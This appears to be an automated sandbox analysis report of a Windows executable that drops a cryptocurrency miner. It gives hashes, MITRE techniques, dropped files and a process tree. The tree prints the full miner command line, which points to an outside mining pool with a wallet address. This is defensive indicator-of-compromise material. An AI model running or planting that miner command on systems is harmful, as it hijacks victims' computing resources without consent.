73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
298s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
13/02/2024, 13:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	b2e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	batexe.exe

Executes dropped EXE 2 IoCs

pid	Process
1408	b2e.exe
1108	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1108	cpuminer-sse2.exe
1108	cpuminer-sse2.exe
1108	cpuminer-sse2.exe
1108	cpuminer-sse2.exe
1108	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/984-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 984 wrote to memory of 1408	984	batexe.exe	85
PID 984 wrote to memory of 1408	984	batexe.exe	85
PID 984 wrote to memory of 1408	984	batexe.exe	85
PID 1408 wrote to memory of 3488	1408	b2e.exe	86
PID 1408 wrote to memory of 3488	1408	b2e.exe	86
PID 1408 wrote to memory of 3488	1408	b2e.exe	86
PID 3488 wrote to memory of 1108	3488	cmd.exe	89
PID 3488 wrote to memory of 1108	3488	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:984
- C:\Users\Admin\AppData\Local\Temp\700F.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\700F.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\700F.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\72BF.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3488
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\700F.tmp\b2e.exe

Filesize
10.1MB

MD5
15eaa0e2bfb20cfc272583496dd00dfc

SHA1
89dee05099a278d496ecdf8105c40ec9c1f7d312

SHA256
f165a9a83a12a03d81f231c3997a0495f154227b452779119de458b7105de498

SHA512
cd352a224b9c6fbac212df6fb8582432f1c3f6abff23ef7b021a43d0b637e56c1b10e6b490bd132e7452cb857d698531e165e0f1d0b0333d9327a21ce2a3e643

Download Submit
C:\Users\Admin\AppData\Local\Temp\700F.tmp\b2e.exe

Filesize
3.4MB

MD5
d71b8d3f4a5ed91f5953e22182d3545d

SHA1
0ae8b80eaa2350342ad465162167b7a7b2b708e2

SHA256
7784897651032862ef51e25f07a3ca75ec3ab562f2b948b986b9a77ea237d6a5

SHA512
72eb20f114423f6cf6d6f72ea3ec57196dca7de4de2ef190658a25091e9873a8fbee1919bb229bcb5b91fd5dfe19d46de632b4b6db7d8b3d281bf4ab91fc6de0

Download Submit
C:\Users\Admin\AppData\Local\Temp\700F.tmp\b2e.exe

Filesize
5.2MB

MD5
90c929db2ba36bf6e0ca13c3fad5ea9a

SHA1
2cc8cccd6b15d52f3303d66302e9a8b81d0bb8d5

SHA256
6ee923f544e080287d310ebd6e5d2b0f24cc6fe1b1d9664f9db09b7c47b3891c

SHA512
56f25943f74c31e3455cdf7316de5961772f093872c8bc36a971713ac5222276c12ac7506079d91488c97b473940ed08a8675b5bf220bce32fae86189f3d5433

Download Submit
C:\Users\Admin\AppData\Local\Temp\72BF.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
700KB

MD5
710f480b88267e02fe9bba273bcef4e8

SHA1
e79551a530e9f72af34ceb8399b29e9a77770825

SHA256
03e046b8449da5d24b268c56fc7693bd4e1069d494c35e265b1d64be615c0e65

SHA512
bf6b36fde34cfe9b7c10f2c272ea0a6f48120023b248b508bab38abb5d5f46c170b6ab33d26dcd80d4fcd7d36310441d2b3a4e0eed2a7ae8986217a729956c06

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.0MB

MD5
2d49f34c87a7b9410eeda4f9544dd2a8

SHA1
1006231a0bfe889c8608c6ee08a47d98af33de8f

SHA256
bded1f235f31ceaff1546c26001d806a07e2683fb8f8c3292bd5a90eab7acff2

SHA512
4f0f39b4a7c1292737f78412153466b5792adb7f05f4bed7ca9cd4fa6881a42d878816080d241cf03f2295b6353ccc6e44f66eed440635d77f4ac883ffe33a71

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
828KB

MD5
1557c17cade134254fdddbc617ecb924

SHA1
c6c0d0706e9bfffaa35a1b76fa0517d8c818839e

SHA256
ba88c5e679d9c51b1acff7789e265512c48d11a5bba7a68f976071ebdf65cc03

SHA512
e6665bb825f93230802c7b8949293a1ad8e53e61c02401dab20f0847ff81be7c913de04ed58470eadddf5478e840c246708ca36ab1f2cc9af14b7d7caa41d14a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
443KB

MD5
3d7a61e9f5f05cb1f216abf42ec9531a

SHA1
486e0417c1513bc2fe3f010193fa97802c297b3e

SHA256
61b686fdc59419444541bc5c6518adb3deb26b38e997e9166b06b234d68a81b4

SHA512
ca7c39b4b036b702fd0d5925edf7b40469a0033bbf9609e410f6e1300b1a4d43d5a42489916b335a907da7f16cfa78d518f5ee29dd99e8a1c30f4649fecbecc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
724KB

MD5
5f8de39f5af7d22addeb2fa14931a9fc

SHA1
8f393f5d2bfb23a8b4f15b8e77ef339875155667

SHA256
d7c3b346ad20b194c7c693d62d734be62825e1a998980b0242c55467c234215d

SHA512
e56afcccdd6fe08d6b0c0859a4bbdb0476e973cea7a7365ee38bb48f6084f4c06f4c26c130bd629293aee74a1248d0af208195324c86edcc8efc21371baddf54

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
764KB

MD5
266dc81f77ec85e93f1e3e9f669e003b

SHA1
d2425bb2d60cd9e2d219bfec057ac4fd0eb86fd4

SHA256
9010f07a0b76a7149ed6cb7cf0ce4ed717f00f1387bb775347f08b25be1cad58

SHA512
13e4a4e1488a99b3e77271902e1b2d27f58a2642030e19a4a16cc7d040b6ba4563fc51017b45318c636bf790c2017e997c9b5bf5dc7aee975215e418c38fe21d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
458KB

MD5
1d34db67541e054aa843271c895512f7

SHA1
20f22c32136c39e136378881d08bc88470357c2d

SHA256
968d07e46b105019e537eb59398fe78b65a20b54ae7bb03fa0a69808fd2b66c7

SHA512
fca4b89049901d8dd0b565777d56a85cd1aab13dfaae866784ebe2d7cfa93b0e0211cf51d24539cb9e68ba352d52cf7bcd80cf5f17977bdfb458aa4c16f4fbfb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
101KB

MD5
123e45de13a19b838f7764b98c1bb41b

SHA1
956e7aeb0ddc7309c39d216fc94fbc04c0f8fc07

SHA256
b1a88047f82994c0dac8146f368d0aa756b9b2eec7d6d5764f98d179cca02911

SHA512
a69fb240f98150d11ecd614344c3160ba49696ee0ebdeefb5527921082c67e245789eefb2b053cfeab6570a9379565c849e7a7d5b936346f4118e92e093836e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
427KB

MD5
3dcd2d32857181db6c2bbdc1a1cf7193

SHA1
70775f12bc455e83f17a2767ea77e609e4fa40d3

SHA256
926b1347a2db62c25862a07a302833daa77759011d4b21f4be99d1d73c449db0

SHA512
d2e77e4b4d53b37cfd193b1dcc1b3a0dcb506832354822c4b3231ab6bd17260db5e001ca1b9c9e97cc2634261ee6515a5216a9f1f30364531f6414ebf1bcb84f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
330KB

MD5
8edd6b8bc1249c14689a08e71df31595

SHA1
6856d60cc46155cba61dfa27014038d31efaa9f9

SHA256
fe9c374de198831d4e5f79315f727e1760f6d2fb2b6ecd37cc2850c86db0a51b

SHA512
2d5aa907a5f50db35566e956a24211c87afed85282316d03a07839db06e896d64052313d8e25506ab68af673b7608b310c0d8118c1c52c086aa97a9310e81ff2

Download Submit
memory/984-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/1108-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1108-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1108-44-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1108-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1108-46-0x00000000747F0000-0x0000000074888000-memory.dmp

Filesize
608KB

Download
memory/1108-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/1108-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1108-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1108-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1108-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1108-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1108-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1108-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1108-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1108-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1108-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1408-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1408-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download